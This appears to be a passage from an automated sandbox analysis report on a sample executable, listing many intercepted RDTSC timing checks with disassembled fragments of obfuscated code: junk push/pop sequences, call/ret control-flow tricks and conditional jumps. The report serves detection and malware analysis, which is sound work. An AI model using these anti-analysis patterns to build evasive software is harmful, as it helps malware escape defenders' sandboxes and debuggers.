    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 553350 second address: 553370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F7648CE84E6h 0x00000009 jc 00007F7648CE84E6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7648CE84EBh 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 553464 second address: 5534AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F7648782558h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 or dword ptr [ebp+1247F53Bh], esi 0x0000002a xchg eax, ebx 0x0000002b jmp 00007F764878255Ch 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5534AB second address: 5534B5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7648CE84E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5062A4 second address: 5062B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F764878255Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5062B8 second address: 5062CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7648CE84F0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555A41 second address: 555A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 mov si, FA08h 0x0000000c push 00000000h 0x0000000e sub si, 5D4Fh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007F7648782556h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555A5F second address: 555A69 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7648CE84E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556B40 second address: 556B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556B44 second address: 556B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557F9E second address: 558032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F764878255Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F7648782558h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F7648782558h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 movzx esi, ax 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push edi 0x0000004a call 00007F7648782558h 0x0000004f pop edi 0x00000050 mov dword ptr [esp+04h], edi 0x00000054 add dword ptr [esp+04h], 00000017h 0x0000005c inc edi 0x0000005d push edi 0x0000005e ret 0x0000005f pop edi 0x00000060 ret 0x00000061 mov esi, dword ptr [ebp+122D1C9Eh] 0x00000067 mov esi, 1CF5FA51h 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F7648782560h 0x00000074 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558032 second address: 558037 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A088 second address: 55A11A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007F7648782556h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F7648782566h 0x00000013 jno 00007F7648782558h 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F7648782558h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov edi, eax 0x00000037 mov esi, 2FEBA60Eh 0x0000003c push 00000000h 0x0000003e add esi, dword ptr [ebp+122D2D20h] 0x00000044 mov edi, 3429FE36h 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e call 00007F7648782558h 0x00000053 pop eax 0x00000054 mov dword ptr [esp+04h], eax 0x00000058 add dword ptr [esp+04h], 00000015h 0x00000060 inc eax 0x00000061 push eax 0x00000062 ret 0x00000063 pop eax 0x00000064 ret 0x00000065 mov esi, edi 0x00000067 xchg eax, ebx 0x00000068 jng 00007F7648782568h 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559E96 second address: 559E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A11A second address: 55A11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A11E second address: 55A122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CC3B second address: 55CC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D272 second address: 55D276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D276 second address: 55D27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D27C second address: 55D282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D282 second address: 55D295 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7648782556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D478 second address: 55D47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561016 second address: 56102D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7648782558h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F7648782558h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56102D second address: 561033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55D47D second address: 55D482 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F37A second address: 55F37E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561033 second address: 56107E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sbb bx, 720Bh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F7648782558h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D313Bh] 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 pushad 0x00000035 jg 00007F7648782556h 0x0000003b pushad 0x0000003c popad 0x0000003d popad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56107E second address: 561082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561082 second address: 5610A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F764878255Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F764878255Eh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5622E9 second address: 5622EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5622EF second address: 5622FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F7648782556h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563332 second address: 563336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564353 second address: 5643D0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7648782558h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F7648782558h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 xor bl, 00000018h 0x0000002a sub edi, dword ptr [ebp+122D2C14h] 0x00000030 push 00000000h 0x00000032 xor dword ptr [ebp+122D35A2h], eax 0x00000038 add ebx, dword ptr [ebp+122D2E4Ch] 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebp 0x00000043 call 00007F7648782558h 0x00000048 pop ebp 0x00000049 mov dword ptr [esp+04h], ebp 0x0000004d add dword ptr [esp+04h], 00000016h 0x00000055 inc ebp 0x00000056 push ebp 0x00000057 ret 0x00000058 pop ebp 0x00000059 ret 0x0000005a xchg eax, esi 0x0000005b jmp 00007F764878255Eh 0x00000060 push eax 0x00000061 push ecx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5643D0 second address: 5643D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5643D4 second address: 5643D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565466 second address: 565470 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7648CE84E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565470 second address: 565476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565476 second address: 56547A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5664B7 second address: 56652B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f jng 00007F764878255Ch 0x00000015 jl 00007F7648782556h 0x0000001b popad 0x0000001c nop 0x0000001d movzx ebx, dx 0x00000020 push 00000000h 0x00000022 jp 00007F7648782567h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F7648782558h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov ebx, dword ptr [ebp+122D1DDDh] 0x0000004a xchg eax, esi 0x0000004b jmp 00007F764878255Ah 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56652B second address: 566531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566531 second address: 566536 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569445 second address: 569460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F7648CE84EEh 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569460 second address: 569464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A4FD second address: 56A50C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7648CE84EBh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 566648 second address: 56664D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5684D8 second address: 5684DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56664D second address: 56666B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7648782563h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565617 second address: 565647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648CE84F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7648CE84F2h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5684DC second address: 5684E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565647 second address: 56564B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5684E2 second address: 5684FE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7648782558h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F764878255Bh 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56564B second address: 565651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5684FE second address: 568508 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7648782556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565651 second address: 565657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B4C6 second address: 56B4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B4CD second address: 56B4D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5656DB second address: 5656E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B4D2 second address: 56B4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5656E1 second address: 5656E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B4D8 second address: 56B4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C5FD second address: 56C601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C601 second address: 56C607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C7DF second address: 56C7E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F7648782556h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C7E9 second address: 56C80F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F7648CE84F9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C80F second address: 56C81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F7648782556h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5751E3 second address: 5751E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5751E9 second address: 575200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F7648782556h 0x0000000c popad 0x0000000d jbe 00007F764878255Eh 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 575200 second address: 575204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 574A98 second address: 574AA4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7648782556h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 574AA4 second address: 574AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F7648CE84E6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B32F second address: 57B33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 js 00007F7648782566h 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580B1F second address: 580B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7648CE84EBh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580176 second address: 58017A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58017A second address: 580188 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7648CE84E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580188 second address: 58019D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7648782561h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5804CF second address: 5804D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5804D3 second address: 5804D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5804D7 second address: 5804DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58065B second address: 58065F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580957 second address: 58095B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58095B second address: 580976 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7648782566h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580976 second address: 580983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F7648CE84E6h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50977A second address: 509789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7648782556h 0x0000000a popad 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5893FA second address: 589400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58984E second address: 589852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 589852 second address: 589856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 589856 second address: 589866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007F7648782556h 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5899A5 second address: 5899AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A11D second address: 58A12C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F7648782556h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538449 second address: 53844F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53844F second address: 538455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590C8F second address: 590CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7648CE84E6h 0x0000000a jmp 00007F7648CE84F9h 0x0000000f popad 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jnp 00007F7648CE84E6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
